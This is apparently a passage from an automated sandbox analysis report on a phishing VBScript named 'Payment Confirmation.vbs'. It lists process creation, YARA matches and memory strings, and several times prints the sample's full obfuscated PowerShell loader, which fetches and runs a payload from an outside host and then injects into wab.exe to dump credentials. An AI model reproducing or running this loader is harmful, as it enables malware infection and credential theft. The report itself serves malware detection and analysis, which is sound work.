                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404BE511_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404C7611_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00415CFE11_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416D7211_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D3011_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D8B11_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E8F11_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040503812_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041208C12_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050A912_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040511A12_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043C13A12_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051AB12_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044930012_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040D32212_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A4F012_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043A5AB12_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041363112_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044669012_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A73012_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004398D812_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004498E012_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A88612_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043DA0912_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00438D5E12_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00449ED012_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041FE8312_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00430F5412_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050C213_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004014AB13_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040513313_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051A413_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040124613_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040CA4613_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040523513_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004032C813_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040168913_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402F6013_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: Payment Confirmation.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_8080.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@18/13@2/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,13_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,11_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification,11_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Renowner.SunJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-KECL2I
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljmzlscf.af2.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7836
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8080
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe, 0000000B.00000002.1849351898.0000000004BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-33248
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
